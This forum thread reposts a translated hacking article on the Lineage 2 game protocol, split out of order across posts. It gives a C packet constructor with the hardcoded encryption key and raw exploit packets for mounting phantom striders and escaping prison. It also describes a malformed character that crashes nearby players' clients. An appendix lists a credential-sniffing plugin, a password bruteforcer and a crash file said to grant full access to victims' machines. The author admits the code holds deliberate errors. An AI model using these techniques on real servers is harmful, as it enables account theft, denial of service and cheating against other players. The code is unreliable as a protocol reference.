TofA

Members
Posts: 57
Feedback: 0%
Gender: Not Telling
Achievements: Newbie (1/16)
Reputation: 0
  1. Hello, I would like to know how to remove the HP/MP numbers displayed at the top middle of the screen. GMs on some servers want a screenshot as proof that you are not using L2w, and sometimes it is not possible to paint over those numbers. Thank you.
  2. I'm curious. I've tried adding BH skills to a Scavenger and it didn't work. It seemed like you can't have the skills of another profession... Looking forward to seeing your method.
  3. Here is what the program printed:

-----------------------
0 1 1 0 1 1 0 1 1 0 0 0 0 0 0 1 0 1 0 1 1 0 0 1 1 1 0 1 1 1 0 0 0 1 0 0 0 1 0 1 1 0 0 0 0 0 0 1 1 1 1 1 0 1 1 0 1 0 0 1
29/31 Probability of success: 48.33
0 0 0 1 1 0 0 0 0 1 0 1 1 1 0 0 0 1 1 0 1 0 1 0 1 0 0 1 1 1 1 0 1 1 0 1 0 0 0 1 0 1 0 0 1 1 0 1 1 0 1 0 1 1 0 1 1 1 1 1
32/28 Probability of success: 53.33
1 0 1 1 0 1 0 1 1 1 0 1 1 1 0 1 1 0 0 1 1 0 1 1 1 1 0 1 1 1 0 0 0 1 0 0 1 1 0 0 0 1 0 1 1 0 0 1 0 1 0 0 1 0 0 0 0 1 0 0
31/29 Probability of success: 51.67
1 0 0 1 1 1 1 0 0 0 0 0 0 0 1 1 0 0 1 1 1 0 1 0 0 1 0 0 0 1 0 0 0 1 0 1 0 1 1 0 1 0 1 0 0 0 1 0 1 1 0 0 1 0 0 1 0 1 1 1
27/33 Probability of success: 45.00
Probability of success in the whole: 50.00

As you can see, these are the very "random types" that f4llen wrote about: 0 and 1 come up with equal probability, and there is no law here. Moreover, in the intermediate measurements (one per 60 numbers) the probability of success deviated slightly from 50%, but the overall figure came out as close as possible to the true probability of a 0 or a 1 coming up. So f4llen's statistics are nothing more than an attempt to systematize ordinary randomness. And the last stone to throw at those who believe that even the weather outside the window affects the enchant probability: l2j has no random number generator of its own; it uses the same library randomizer that was used above. The only difference is that the enchant probability is affected by a single number set by the administration. Rest assured, it is the same in lineage2 off. As a result, I want to say: there is no point trying to cheat rand(); more likely it will cheat you =) One has to look for bugs in the enchant process itself, but, as shown above, that process is too simple to be bugged. And in general, "there are no accidents, only laws unknown to us" © Someone.

12. Geodata (walking through walls).
Today someone on ICQ pinged me and started arguing that l2j is no different from the off server. In that connection I decided to add a few words to the article about geodata in l2j and off. Movement through the world in la2 is implemented quite interestingly. It turns out that both the server and the client, in parallel, keep watch over where you go. More precisely: you click on the point you want to reach; the client checks against the geodata it has whether it is possible to go there and, if yes, sends a request to the server. The server, in turn, according to its own geodata, either allows it or returns you to the starting position. This is exactly the phenomenon called "invisible walls", which, by the way, is typical of our free-shared projects with crooked locations. l2j has no geodata; it is attached to it separately. What does that mean? That the character's movement is watched only by the client, against the geodata the client has. Therefore, using a bot (which obviously has no geodata either), you can walk through walls, because neither the server nor the client (in the person of the bot) simply knows about them. By the way, this problem is not only l2j's. On C1Off, the C3/C4 locations are as a rule also without geodata, i.e. there too responsibility for movement is assigned only to the client. Looking at movement in more detail, it is implemented by the packet "0x01 MoveBackwardToLocation". It carries two sets of coordinates: where we stand and where we want to go. After that packet the server starts moving us toward the desired point step by step. And it does not send us new coordinates with each step! For the client to learn where it currently is, the packet "0x48 ValidatePosition" is sent. That is, on the whole, we send a packet with the coordinates we want to reach, and then simply check periodically, roughly speaking, how far we have got.
But that is just for general education, so to speak =)

13. Jokes with SocialAction (0x1b)

What SocialAction is, I think, needs no explanation. It turns out that besides laughing, greeting, victory and so on, the animation on LVL UP is also a SocialAction. And, as far as you know, the request to perform a SocialAction is sent by the client, i.e. we can give ourselves a lvlup at any moment =) Only the animation, of course. Here is the format of a SocialAction packet:

1b // packet type (SocialAction)
0f 00 00 00 // action number (0f - lvlup)

14. The bug with Ride (0x6a)

The "Ride" request is sent by the client when it wants to mount a strider or a wyvern. Format:

Code:
6a // packet type
00 00 00 00 // 0/1 dismount/mount
00 00 00 00 // pet number: 1 - strider, 2 - wyvern

When you have a strider summoned and you send the "Ride" request, the strider actually disappears (i.e. it leaves the game and loses its OID; that is exactly why, when you dismount, it vanishes), and you sit down not on your own particular strider but on a sort of standard strider :) I put that a bit inaccurately, but fine. It turned out that on some La2 servers there is no check of whether you summoned a strider at all before sitting on it. That is, out of the blue, by sending the packet

6a 01 00 00 00 01 00 00 00

you will sit on a strider even though you did not summon it. And even if you don't have one. In the same way one can sit on a wyvern. This bug, like the SocialAction jokes, was found by a person under the nick Maddaemon. Thanks to him.

15. We log out chars from the game

I found this bug by accident while studying all the same mutants. One of the questions was why, when creating a char, you specify a nonexistent race (a number greater than 4), a char with a human's build is always created?
And this human cannot learn skills from human NPCs, i.e. nothing except its build connects it with humans. And so, it turned out that only C1/C3 clients perceive such chars as humans. The C4 client simply does not find a build for such chars and crashes with an error. That is, as soon as such a char gets into the visibility range of a la2 C4 client, the client crashes. By visibility range I mean not what you see on the screen, but roughly the range of the "/target" command. So, for example, having placed such a character near the castle for the duration of a siege, the attackers will have no chance, since taking the castle with bots is extremely problematic, and with clients they simply cannot enter the game. I tested this on three large domestic C4 servers (not l2j); it worked everywhere. With such chars, by the way, one can check characters for bots :) If it did not crash, it is a bot. But that is a method for GM-sadists. http://m00.void.ru/nuke.rar - a video recording from one of the Russian C4 servers. It shows the effect such chars have on other players.

16. The bug with RequestRestartPoint (revival and escape from prison)

This bug was found by our compatriot from the underground www.allcheats.ru under the nick sshd. When you die, you get a window with a choice of the place where you will revive. Under normal conditions there is only one button there: "return to the nearest village". After pressing it the game sends the packet:

Code:
6d // packet type (RequestRestartPoint)
00 00 00 00 // the argument which actually tells the server where to return us

The bug is that it is precisely the client that tells the server where to return the char after death. That is, not the client, but us.
LA2 C3/C4 servers support the following values of the argument (place of return):
0 - return to town (to the city)
1 - hide PK (if you are a PK, returns you to the PK city or to the vicinity of the city where you were killed)
2 - to castle
3 - to siege HQ (to the flag during a siege)
4 - fixed, festival (during the festival of darkness revives you on the spot)

Thus, by sending "04 00 00 00" instead of "00 00 00 00", our char will revive at the place where it was actually killed. In connection with this bug I had an idea about how a character could get out of prison. For this the char that is in prison must be in a clan. This clan registers for a siege and plants a flag; then the char in prison must somehow be killed. On antaras.ru, for example, that is not difficult: there are aggressive mobs around the prison that attack through the wall. Then you simply send a "RequestRestartPoint" packet with the argument "03 00 00 00" and the char appears (should appear :)) alive at the flag.

17. Stripping someone else's character without knowing either the login or the password - is that really possible?

Yes, unfortunately it is. I decided to remove this paragraph from the article, as it is a very serious hole in lineage2 which would still make quite a lot of noise. I don't want it on my conscience :) I will say only that there is a way to log in as random characters (i.e. we cannot choose a concrete character; the server does that). So far it has been tested only on the well-known server www.l2extreme.com, but I am sure it works on others too. So don't be surprised if your char with a password like "6IlZk9qR[!]" suddenly gets undressed.

18. Result

I have described a sufficient number of bugs. Unfortunately, by the time this article is published most of them are no longer relevant.
What is relevant now or currently in development will probably be posted later on the forum la2brute.5bb.ru.

V. Bugs of the new generation

[cut out] I can say only that my new in-game bot LA2Monster will use them.

VI. A few words about C4

In general C4 still cannot stabilize in any way. More precisely, there is a certain split in the implementation of authorization. L2J C4 servers began to use RSA to encrypt the authorization packet (as, by the way, does off from NCSoft). And a private/public key pair is generated for each connection. In the first packet the server sends the client a 1024-bit public key, with which the client, on top of blowfish, encrypts the packet with the login/password. This method guarantees that nobody from outside can obtain a client's login and password. Though, if you recall the breaking of RC5-64, recovering a 128-byte key does not seem so unattainable. It is worth noting that generating an RSA key pair is quite a labour-intensive job. For me, generating a key pair with the openssl libraries took ~1.5-2 seconds, which for a server with, say, 1000 people online is an unacceptable luxury. Then again, the login-server, as NCSoft intended, should be on a different machine than the game-server, but, as I already wrote above, this is not always done here in Russia. As for C1Off servers converted to C4, RSA is not used in them. Although the handling of the internal identifiers used for authorization on the game-server has changed. Thus the same C4 client is used both for l2j and for C1Off-C4.

VII. Epilogue.

Of course, an RFC on lineage cannot be built from this article; I naturally skipped some points, either because they were not important or because I had not fully understood them myself. Either way, I believe I have given you plenty of food for thought.
If you disagree with something, or know (think you know :D) something I don't, write to d4rk@securitylab.ru, or by PM on www.allcheats.ru to the nick "nop". I will be glad to talk.

VIII. References.

http://72.14.203.104/search?q=cache:Dt3Jo9GNJcJ:gamehaqs.com/forums/index.php%3Fshowtopic%3D5041+blowfish+lineage2&hl=ru&gl=ru&ct=clnk&cd=1 - a Google-cached bbs where lineage client-server interaction was discussed. Judging by the posts, people stubbornly refuse to look at the l2j sources and try to find a way to authorize on a server at random.
http://forum.ragezone.com/server-help-extra/lin1-server-emulator-incomplete-cant-even-login-26438.html - the same
http://allcheats.ru/forums/showthread.php?t=1844 - the same, only ours, Russian. Unlike the Americans, they got quite far.
http://cheaters.net.ua/forum/index.php?s=083fef4f61997fc4be2ad3b0a98ba8a2&showtopic=254&pid=2254&st=0&#entry2254 - F4llen's article about fake-enchant and about "random types" (it was mentioned in this article in the paragraph about enchanting).
http://www.javable.com/columns/crypto/algorythms/01/ - an excellent section about blowfish.
http://arbuz.uz/z_pihns.html - an interesting article about calculating the number 3.14 from probability theory. For broadening one's horizons.
http://www.securitylab.ru/analytics/216301.php - my previous article on a similar subject. It is simpler thanks to the intuitively clear HalfLife protocol; I recommend beginners start with it.
http://la2brute.5bb.ru - the commercial project.
http://m00.void.ru/nuke.rar - video recording - the appendix to paragraph 13 (chars thrown out of the game)
http://la2brute.5bb.ru/viewtopic.php?id=52 - shows how to use LA2Fun to learn skills of any level on projects and to mix professions on l2j.
http://la2brute.5bb.ru/viewtopic.php?id=53 - shows how to create mutants (an immortal one as the example) on projects using LA2Fun.
IX. Appendices to the article.

The appendix to the article is at: m00.blackhat.ru/la2shit.rar

Contents:
game-serv-encryption.txt - source code of game-server packet encryption (posted by sauron on allcheats.ru).
grabber.c - an old example of pulling nicknames from a site, with www.antaras.ru as the example. By the way, antaras.ru introduced cookies a long time ago, so this example no longer works there. This code was mentioned in the section about password search.
ID.rar - the list of items and their corresponding IDs for la2brute_1.1.
OLD.rar - the old test version of la2brute. It was written in February-March of this year. It hangs and crashes, so consider it a PoC =)
la2reklamer.rar - a program for mass messaging. It downloads the nicknames of the players who are online by itself and, within a minute, personally writes each of them a private message.
raid.jpg - an example of how immortal mutants can be used =) author Hint
screenshot1.jpg - a screenshot of the auth-packet generator
screenshot2.jpg - a screenshot of my sniffit patch and the password bruteforcer for La2 servers working together.
shot1.JPG, shot2.JPG, shot3.JPG - screenshots of mutants created with la2fun
sniff.exe - eh, I'm tearing this from my heart.. a sniffer which intercepts and decrypts incoming/outgoing la2 traffic. Both login-server and game-server. It is tuned to my network interface, so to use it you will have to dig around in the binary =)
mass.nuke.avi - a recording of how hundreds of people drop from a server because of my char.
la2-example.c - an example of constructing a RequestAuthLogin packet
Sniffit.LA2C3.plug.rar - a plug-in for sniffit which allows intercepting other people's RequestAuthLogin packets and pulling the login/password out of them
l2.crash.ini - an encrypted settings file for the L2C3 client which crashes it. On successful exploitation it presumably allows full access to the computer on which this l2.ini was used.
la2fun_1.2.demo.rar - a cut-down LA2Fun 1.2. It can create mutants, immortal chars, headless chars, and learn skills of any level. And LA2Brute 1.5 (C3/C4). I decided not to release the latest versions of LA2Fun out of respect for those who bought them for money.. I also wanted to post the linux version of la2brute, but somehow couldn't find it :\

Special thanks to h0snp, sshd and hint =) And also greetings to Silence/EF ;) and to the channel #m00 on irc.blackhat.ru

© darkgrey / m00.blackhat.ru
All credits for the translation go to CAHEK
source http://www.clanlq.com/forum/viewtopic.php?p=2209
  4. I. Introduction
II. Login-server
 1. Packet encryption
 2. Packet structure
 3. A RequestAuthLogin packet constructor in C
III. Game-server
 1. The authorization process on a server
 2. Packet encryption
 3. Protocol
 4. xID and ObjectID
 5. Packet examples: a) buying/selling b) private messages c) talking with an NPC, on the example of learning skills
IV. Problems and how they can be used
 1. No limit on the number of authorization attempts
 2. Packet encryption
 3. Remote detection of the lineage2 server version
 4. Remote "hanging" of the login-server
 5. Cloning
 6. Creating "mutants" and mixing skills
 7. Immortality
 8. 'remote DoS' and what it gives
 9. integer overflow in the l2j network handler
 10. SQL injection
 11. Enchant (or a fairy tale about 100% enchant)
 12. Geodata (walking through walls)
 13. Jokes with SocialAction (0x1b)
 14. The bug with Ride (0x6a)
 15. Throwing chars out of the game
 16. The bug with RequestRestartPoint (revival and escape from prison)
 17. Stripping someone else's character without knowing either the login or the password - is that really possible?
 18. Result
V. Bugs of the new generation
VI. A few words about C4
VII. Epilogue
VIII. References
IX. Appendices to the article

I. Introduction.

What is lineage? It is a representative of a modern kind of game - MMORPG (Massively Multiplayer Online Role-Playing Game). I would even say one of the most successful and popular, if not the most =). Of course, it is hard to talk about the popularity of this game, since counting the exact number of people "involved" in lineage is probably impossible, but servers such as www.lineageii.ru (with a maximum registered online of 10,000 people) and the official www.lineage2.com (with its 100,000, and paid at that) make it clear that the figure must be impressive.
The essence of the game is that (as in any other RPG) you have a character and a huge world in which you need to obtain money, clothes, weapons and experience. Ultimately, to fight with players like yourself and to flatter your vanity with victories. For some people, for whom things are not working out in real life, it allows self-realisation in the virtual world - to become a famous warrior and even to find a bride (yes, quite a lot of girls play lineage too). Among all other online (and not only online) games, lineage wins you over with its graphics. Personally, at first it seemed incredible to me that someone could create such wonderful three-dimensional beauty for a mere game. But the game has its dark sides too. First, it has the property of drawing you in. And not simply drawing you in, but causing an addiction that is extremely hard to fight. Secondly, you understand, in an industry in which hundreds of thousands of game addicts from practically all layers of society are involved, things cannot do without money (like everything in our life). Indeed, some people who have a family and a job simply do not have the time to level a character up to the needed level for months. This gamer layer gave birth to people who started selling game levels and items for real money, thereby creating a new niche in the lineage world. At present, depending on the size of a server (and its rates), the cost of a well-dressed high-level character can vary from $300 (on the dying www.antaras.ru) up to $5,000 on an official server. The funniest thing is buying items from the administration of this or that server. Think about it: the gamer pays an N-th number of killed raccoons so that the administrator adds 1 record to the game database. That's how money is made out of thin air. Well, I got a bit carried away describing the game :) The year spent on it shows.
Of course, in such an industry (where money and a cloud of naive and at times silly gamers are involved) things cannot do without us, the inquisitive minds. Someone buys characters, someone creates and levels them himself; we choose the third, untrodden path. The thing is that in the several years of this game's existence not a single vulnerability has been found in it (apart from purely game bugs), and not a single program has been written for it that could give attackers access to other people's accounts. And do you know why? It seems to me that the young, inexperienced ones (whose posts flood bugtraq) were pushed away by the nasty packet encryption in lineage. And even in decrypted form the packets look like a chaotic set of characters. Perhaps the old-timers remember my article about the client-server interaction protocol and vulnerabilities of Half-Life (www.securitylab.ru/analytics/216301.php). The purpose of that article was to describe the game and to hand over on a plate almost everything I had achieved in studying it. In this article I will tell how to decrypt lineage2 traffic, say a little about the features of the protocol, and give some of the work (mine and others'); all the rest I will not publish, as general use of it could lead to chaos in this fine, balanced and fully formed virtual world =)

ATTENTION.
1. I warn you right away that I will sometimes come back to the article about half-life for analogies; it will help you understand what is written more easily. And make it easier for me to write.
2. The article was written on the basis of analysis of decrypted packets and study of the source code of the lineage2 server l2j, written in Java. Accordingly, the article is 100% valid for l2j, and for the official server as far as l2j is valid for it =)
3. All source code is written under linux. Compilation requires the blowfish lib. The libs from the openssl package will do with a small change to the code.
4. By the way, about changing the code. The source code given in the article contains small logic errors, to rule out thoughtless use. If you get into the article, fixing them will not be a problem.
5. And the last. The full version of the article was for a long time available only to a limited circle of people, and with the release of the C4 version of lineage2 and the fixing of most of the bugs it has become sharply obsolete. About C4 I will say a little at the end.

II. Login-server.

Introduction. Let us begin with the fact that the developers of lineage2 separated the login server from the game server, more or less to unload the already overloaded channel of the game server. Besides, the login server has the property of hanging (this began with the c3 version of lineage and continues to this day) and not letting users onto the server. But those who are already playing feel no discomfort at all =) And because of the absence of those same guys who could find and clearly explain to the developers where the bug had crept in, it remains unfixed to this day. And so, despite all the charm of the idea of unloading the game channel, our domestic administrators stubbornly stick the login server on one machine together with the game.

1. Packet encryption.

For encrypting the packets that the login-server exchanges with the client, lineage uses blowfish. Yes, the algorithm developed by Bruce Schneier in 1993. About blowfish it is important to know that it is a symmetric block cipher. Symmetric means that the algorithm uses 1 secret key with which data are encrypted/decrypted. And speaking specifically about blowfish, on the basis of this key 18 32-bit subkeys and 4 matrices of 256 32-bit words each are generated, with which the data, in turn, are encrypted/decrypted. Block cipher means that blowfish processes data in blocks (of 8 bytes). And it also means that if the integrity of the ciphertext has been broken, we cannot recover that part in any way.
With regard to lineage, it must be said that the key from which the subkeys are generated is a constant and is written explicitly in the l2j sources (this is where 99% of lineage researchers fell down, assuming that the key must be transmitted in one of the packets - see the references at the end). It is also important to note that the first 2 bytes of a packet's data are not encrypted. With encryption, I think, we are done. Let's move on.

2. Packet structure.

The first two bytes of a packet (the ones that are not encrypted) contain the length of the packet data (just as in halflife). The next byte carries information about the packet type. The login-server processes these packets:
0x00 - RequestAuthLogin (authorization request - contains the login and the password)
0x02 - RequestServerLogin (request to join a server)
0x05 - RequestServerList (request for the server list)
It simply does not answer the others, only leaving a record in the logs. The client processes packets of the following types:
0x01 - authorization failed
0x03 - you are successfully authorized
0x04 - the answer to RequestServerLogin
0x06 - the answer to RequestServerList
And also a few additional packets about an account ban, version check, etc. - they are presented below. The next byte is supplementary to the requests described above. For example, if the server answered our authorization request with a packet of type 0x01, the next byte will contain the reason why authorization failed (the important ones for us: 0x03 - wrong login or password, 0x07 - someone is already using the account, 0x11 - a temporary password is set). But actually this byte is not entirely a service byte. For example, in RequestAuthLogin packets the login starts at this byte.
Then there are n bytes which are no longer control bytes but carry information defined by the packet type. Well, for example, for "RequestAuthLogin" this field contains the login and the password. The last 8 bytes of the packet have an important purpose. They contain a checksum of everything that precedes them, except, again, the first two bytes of the packet. How is this checksum calculated? 32-bit words are taken from the data in sequence. The first is XORed with the second. The result of that operation is XORed with the next word, and so on. An example of checksum calculation will be shown below.

3. The packet constructor in C.

With the packet structure we are done; now everything that was done by hand above can be implemented in a program.

Code:
/* la2-example.c ~ LineAge2 c3 RequestAuthLogin packet constructor
   Helps to understand lineage2 authentication.
   darkgrey / m00.blackhat.ru ~broken */

#include <stdio.h>
#include <string.h>
#include "/usr/local/include/blowfish.h"  // with OpenSSL: <openssl/blowfish.h>, and BF_ecb_encrypt(in, out, &bfkey, BF_ENCRYPT) in place of BF_encrypt()

// key length
#define KEY_LEN 20
// The length of a RequestAuthLogin packet is constant and equals AUTH_PKT_LEN + 2
#define AUTH_PKT_LEN 0x30

// The key from which the sub-keys are generated
char key[] = "[;'.]94-31==-&%@!^+]";

// The bfkey structure which, after sub-key generation, holds the 18 P sub-keys and the 4 S matrices
BF_KEY bfkey;

// Calculates the checksum and inserts it into the packet
int add_ckecksum(char *raw, int count)
{
    long chksum = 0L;
    int i = 0;
    long ecx;

    for (i = 0; i < count; i += 4) {
        ecx = raw[i];
        ecx |= raw[i + 1];
        ecx |= raw[i + 2];
        ecx |= raw[i + 3];
        chksum ^= ecx;
    }
    printf("checksum: 0x%lx\n", chksum);
    memcpy(raw + count, (char *)&chksum, 4);
    return 0;
}

// Adds the login and the password to the packet (separated from the main function for readability)
int add_lp(char *raw, char *l, char *p)
{
    l[15] = '\0';
    p[17] = '\0';
    memcpy(raw + 3, l, strlen(l));
    memcpy(raw + 17, p, strlen(p));
    return 0;
}

// Prints the packet in readable form (for debugging)
int print_packet(char *raw, int len)
{
    int i, c = 0;

    for (i = 0; i < 54; i++)
        printf("_");
    for (i = 0; i < len + 2; i++) {
        if ((c % 0x10) == 0)
            printf("\n0x%.2x | ", c);
        printf("%.2x ", raw[i] & 0xFF);
        c++;
    }
    printf("\n\n");
    return 0;
}

// The main function which builds the packet
int build_auth_packet(char *login, char *pwd)
{
    int count = AUTH_PKT_LEN / 8;
    int i;
    char packet_skeleton[] =                                            // RequestAuthLogin packet skeleton
        "\x32\x00"                                                      // packet length, constant: 0x30 + 0x02
        "\x00"                                                          // packet type (0x00 - RequestAuthLogin)
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"      // login
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" // password
        "\x08"                                                          // marks the end of the login/password section
        "\x00\x00\x00\x00\x00\x00\x00\x00"                              // not used in c3 (reserved?)
        "\x00\x00\x00\x00"                                              // checksum
        "\x00\x00\x00\x00";

    // add the login and the password to the packet
    add_lp(packet_skeleton, login, pwd);
    // add the checksum
    add_ckecksum(packet_skeleton + 2, AUTH_PKT_LEN - 8);
    printf("Auth packet dump (non-crypted):\n");
    print_packet(packet_skeleton, AUTH_PKT_LEN);

    // encrypt in 8-byte blocks, skipping the 2-byte length
    for (i = 0; i < count; i++)
        BF_encrypt((BF_LONG *)((short *)&packet_skeleton + 1 + i * 4), &bfkey, BF_ENCRYPT);

    printf("Auth packet dump (encrypted):\n");
    print_packet(packet_skeleton, AUTH_PKT_LEN);
    return 0;
}

int main()
{
    char login[] = "m00",   // test login
         pwd[] = "ownzu";   // password

    printf("\nla2-example.c ~ LineAge2 c3 RequestAuthLogin packet constructor\n\n");
    // generate the sub-keys
    BF_set_key(&bfkey, KEY_LEN, key);
    // build the packet
    build_auth_packet(login, pwd);
    return 0;
}
/* eof */

Here is what the program printed on my box:

bash-2.05b$ ./a.out

la2-example.c ~ LineAge2 c3 RequestAuthLogin packet constructor

checksum: 0x224a0377
Auth packet dump (non-crypted):
______________________________________________________
0x00 | 32 00 00 6d 30 30 00 00 00 00 00 00 00 00 00 00
0x10 | 00 6f 77 6e 7a 75 00 00 00 00 00 00 00 00 00 00
0x20 | 00 08 00 00 00 00 00 00 00 00 77 03 4a 22 00 00
0x30 | 00 00

Auth packet dump (encrypted):
______________________________________________________
0x00 | 32 00 09 d9 97 e2 29 89 8c b5 1a a0 1a 83 74 43
0x10 | 39 fc 2f 03 c3 26 9c 65 b0 c4 20 28 11 c1 6a 95
0x20 | 3e 44 45 46 2a ae b9 18 91 2e 75 56 d0 dc 40 b5
0x30 | 77 2a

bash-2.05b$

III. Game-server

1. The authorization process on the login-server and joining the game-server.

Authorization on the login server takes place in several stages.
1) the login server sends us a greeting in the form of an 11-byte packet (in general it contains version information).
2) we answer it with a RequestAuthLogin request
3) if the password is correct, it sends us a packet with the 32-bit number of our account (it is always constant) - we will call it SessionKey #1.
4) we send it RequestServerList, to which the server answers with the list of game servers, containing ports, the number of players online and the maximum number of users.
5) we send RequestServerLogin, on which the server checks our AccessLevel (if it equals -1, we are banned) and, depending on our login, password, access level and socket, generates a unique 32-bit SessionKey #2 with which we will subsequently be authorized on the game-server. If the game server is down, simulates that condition (administrators do this for work on the server) or is simply full, it refuses to accept us.
6) if all is well, we go to the game server. We send it a certain packet (different for each C3 server, but constant), to which it answers with a 12-byte packet containing the first 4 bytes of the key, which are attached to the other 4 bytes (which are constant), giving a 64-bit key. From then on we use it to decode and encode game packets. It is important to note that with each packet encoded, its length is added to the first part of the key.
7) we send it the login and the two identifiers (already encrypted) which we received in the session with the login-server. In reply we receive the list of characters.
So, in 7 stages we get authorized on the server =) Complicated, but safe. Some of you probably have a question: is it possible to connect to the game server directly, without the login server taking part? I will write about that below.

2. Packet encryption

As I already wrote about packet encryption above, for encrypting game packets Lineage uses a 64-bit key. Its first 4 bytes are taken from the very first packet of the game server; the second part was described above. Then the N-th byte of the plaintext is XORed with the N-th byte of the key. In parallel with that, the (N-1)-th byte of the plaintext is XORed with 0xFF. A bitwise AND is then applied to the results of both calculations. Every byte, starting from the first, is encrypted by this algorithm. As you can see, the way each subsequent byte is encrypted depends on the previous one. And that means that if the first part of a packet is damaged for whatever reason, or is simply missing, we cannot decrypt the second part. Well, that is just an aside; it is actually not important for us.

It is also important to note that the first part of the key is variable. With each newly decrypted packet, the length of that data is added to the first 4 bytes. That is, having the initial key (from the moment of connecting to the login server) and having pulled a single packet out of some moment of a session with the game server, we cannot decrypt it. To do that we need to recover all the packets that came before it. In principle, the number of possible key combinations is ~423 million. Given the simplicity of the algorithm, modern computers can do about 10 000 iterations per second (maybe more) and find the key in at most 12 hours. But for that we would need to know at least something about the contents of the packet. Why did the authors make the key variable? I think it is clear to everyone: for safety.
Though we are talking about TCP here (rather than UDP, as in, say, Half-Life), where it is extremely inconvenient for an outsider to "insert" himself into a session.

4. Protocol

As in the login-server packets, the first two bytes hold the length. The next byte is the packet type. Here are the packet types that the Lineage 2 C3 client should handle (I will comment on some of them):

Code:
// sent by the login server
0x01 loginfail2
0x02 accountKicked1
0x03 loginok
0x04 serverlist
0x05 serverfail
0x06 playfail
0x07 playok
0x08 accountKicked
0x09 blockedAccMsg // banned
0x20 protocol version different
0x00 VersionCheck
// sent by the game server
0x01 MoveToLocation
0x02 NpcSay
0x03 CharInfo // means the surrounding characters
0x04 UserInfo
0x06 Attack
0x07 Attack
0x08 Attacked
0x09 Attacked
0x0a AttackCanceld
0x0b Die
0x0c Revive
0x0d AttackOutOfRange
0x0e AttackInCoolTime
0x0f AttackDeadTarget
0x10 LeaveWorld
0x11 AuthLoginSuccess
0x12 AuthLoginFail
0x13 CharList // the character list
0x15 SpawnItem // on some C3 servers, the reply to character selection
0x16 DropItem // on some C3 servers, carries info about a mob
0x17 GetItem
0x18 EquipItem
0x19 UnequipItem
0x1a StatusUpdate
0x1b NpcHtmlMessage // on some C3 servers, carries the list of equipment with ItemID and their ObjectID
0x1c SellList
0x1d BuyList
0x1e DeleteObject
0x1f CharSelectInfo
0x20 LoginFail
0x21 CharSelected
0x22 NpcInfo
0x23 NewCharacterSuccessPacket
0x24 NewCharacterFailPacket
0x25 CharCreateOk
0x26 CharCreateFail
0x27 ItemList
0x28 SunRise
0x29 SunSet
0x2a EquipItemSuccess // deprecated
0x2b EquipItemFail // deprecated
0x2c UnEquipItemSuccess // deprecated
0x2d UnEquipItemFail // deprecated
0x2e TradeStart
0x2f TradeStartOk // deprecated
0x30 TradeOwnAdd
0x31 TradeOtherAdd
0x32 TradeDone
0x33 CharDeleteSuccess
0x34 CharDeleteFail
0x35 ActionFail
0x36 ServerClose
0x37 InventoryUpdate
0x38 TeleportToLocation
0x39 TargetSelected
0x3a TargetUnselected
0x3b AutoAttackStart
0x3c AutoAttackStop
0x3d SocialAction
0x3e ChangeMoveType
0x3f ChangeWaitType
0x40 NetworkFail // deprecated
0x43 CreatePledge
0x44 AskJoinPledge
0x45 JoinPledge
0x46 WithdrawalPledge
0x47 OustPledgeMember
0x48 SetOutPledgeMember
0x49 DismissPledge
0x4a SetDismissPledge
0x4b AskJoinParty
0x4c JoinParty
0x4d WithdrawalParty
0x4e OustPartyMember
0x4f SetOustPartyMember
0x50 DismissParty
0x51 SetDismissParty
0x52 MagicAndSkillList
0x53 WarehouseDepositList
0x54 WarehouseWithdrawalList
0x55 WarehouseDone
0x56 ShortCutRegister
0x57 ShortCutInit
0x58 ShortCutDelete
0x59 StopMove
0x5a MagicSkillUser
0x5b MagicSkillCanceld
0x5d CreatureSay
0x5e EquipUpdate
0x5f StopMoveWithLocation
0x60 DoorInfo
0x61 DoorStatusUpdate
0x63 PartySmallWindowAll
0x64 PartySmallWindowAdd
0x65 PartySmallWindowDeleteAll
0x66 PartySmallWindowDelete
0x67 PartySmallWindowUpdate
0x68 PledgeShowMemberListAll
0x69 PledgeShowMemberListUpdate
0x6a PledgeShowMemberListAdd
0x6b PledgeShowMemberListDelete
0x6c MagicList // deprecated
0x6d SkillList
0x6e VehicleInfo
0x6f VehicleDeparture
0x70 VehicleCheckLocation
0x71 GetOnVehicle
0x72 GetOffVehicle
0x73 TradeRequest
0x74 RestartResponse
0x75 MoveToPawn
0x76 SetTo
0x77 StartRotating
0x78 FinishRotating
0x79 MoveBackwardToLocation // appears as a result of a skill, or of to_the_nearest_village after death
0x7a SystemMessage
0x7d StartPledgeWar
0x7e ReplyStartPledgeWar
0x7f StopPledgeWar
0x80 ReplyStopPledgeWar
0x81 SurrenderPledgeWar
0x82 ReplySurrenderPledgeWar
0x83 SetPledgeCrest // deprecated
0x84 PledgeCrest
0x85 SetupGauge
0x86 ShowBoard
0x87 ChooseInventoryItem
0x89 MoveToLocationInVehicle
0x8a StopMoveInVehicle
0x8b ValidateLocationInVehicle
0x8c TradeOtherAdd2
0x8d TradePressOwnOK // deprecated
0x8e MagicSkillLaunched
0x8f FriendAddRequestResult
0x90 FriendAdd // deprecated
0x91 FriendRemove // deprecated
0x92 FriendList // deprecated
0x93 FriendStatus // deprecated
0x94 TradePressOtherOk // deprecated
0x95 FriendAddRequestResult2
0x96 LeaveWorld2
0x97 AbnormalStatusUpdate
0x98 QuestList
0x99 EnchantResult
0x9a AuthServerList // deprecated
0x9b PledgeShowMemberListDeleteAll
0x9c PledgeInfo
0x9d PledgeExtendedInfo
0x9e SurrenderPersonally
0x9f Ride
0xa1 PledgeShowInfoUpdate
0xa2 ClientAction
0xa3 AquireSkillList
0xa4 AquireSkillInfo
0xa5 ServerObjectInfo
0xa6 HideGm
0xa7 AquireSkillDone
0xa8 GMViewCharacterInfo
0xa9 GMViewPledgeInfo
0xaa GMViewSkillInfo
0xab GMviewMagicInfo
0xac GMViewQuestInfo
0xad GMViewItemList
0xae GMViewWarehouseWithdrawList
0xaf PartyMatchList
0xb0 PartyMatchDetail
0xb1 PlaySound
0xb2 StaticObject
0xb3 PrivateSellList2
0xb4 PrivateBuyList2
0xb5 PrivateStoreMsg
0xb6 ShowMinimapPacket
0xb7 ReviveRequest // deprecated
0xb8 AbnormalVisualEffect
0xb9 TutorialShowHtml
0xba TutorialShowQuestionMark
0xbb TutorialEnableClientEvent
0xbc TutorialClose
0xbd ShowRadar
0xbe DeleteRadar
0xbf MyTargetSelected
0xc0 PartyMemberPosition
0xc1 AskJoinAlliance
0xc2 JoinAlliance
0xc3 WithdrawAlliance
0xc4 OustAllianceMemberPledge
0xc5 DismissAlliance
